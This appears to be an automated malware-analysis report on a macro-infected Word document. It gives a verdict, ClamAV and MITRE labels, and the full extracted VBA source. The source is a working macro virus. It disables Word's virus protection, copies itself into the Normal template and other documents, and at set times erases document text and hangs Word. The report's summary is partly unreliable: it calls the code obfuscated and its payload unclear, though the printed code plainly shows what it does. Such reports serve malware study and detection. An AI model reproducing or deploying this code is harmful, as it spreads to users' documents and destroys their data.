Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The macros appear to be designed to obfuscate their own code and potentially modify the document content, as indicated by the `CIH` subroutine and the manipulation of document ranges. The `ClamAV: Doc.Trojan.Hich-1` detection further supports its malicious nature. The exact payload or behavior is unclear due to macro obfuscation and truncation.
Heuristics (2)
- ClamAV: Doc.Trojan.Hich-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Trojan.Hich-1
- VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1959 bytes |

SHA-256: 59f4192feb218fb436f8b6faecf0aaa5106471733837ba9aef0c0a1b72c6dbe3
Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
CIH
End Sub
Private Sub CIH()
On Error Resume Next
Dim StartLoc, ProcLen, Obj, Str, i, s, Lose
s = ActiveDocument.Saved: Application.EnableCancelKey = 0
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Set Obj = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
StartLoc = Obj.ProcStartLine("CIH", 0): ProcLen = Obj.ProcCountLines("CIH", 0)
Str = Obj.Lines(StartLoc, ProcLen)
Set Obj = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
i = Empty: i = Obj.ProcStartLine("CIH", 0)
If i <> Empty Then
Set Obj = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
i = Empty: i = Obj.ProcStartLine("CIH", 0)
If i <> Empty Then Obj = ""
End If
If Obj <> "" Then
i = Empty: i = Obj.ProcStartLine("Document_Close", 0)
If i = Empty Then
Obj.InsertLines Obj.CountOfLines + 1, "Private Sub Document_Close()" & Chr(13) & " CIH" & Chr(13) & "End Sub"
Else
Obj.InsertLines Obj.ProcStartLine("Document_Close", 0) + 1, " CIH"
End If
Obj.InsertLines Obj.CountOfLines + 1, Str
End If
If Minute(Now) = 1 Then ActiveDocument.Range(ActiveDocument.Characters.Count / 2 * (1 - 0.1 * Rnd), ActiveDocument.Characters.Count / 2 * (1 + 0.1 * Rnd)) = ""
If Minute(Now) = 26 Then ActiveDocument.Range(0, ActiveDocument.Characters.Count) = "": Lose = True
If s = False Then ActiveDocument.Save
If Lose = True And ActiveDocument.Saved Then Do: Loop
ActiveDocument.Saved = True
End Sub
```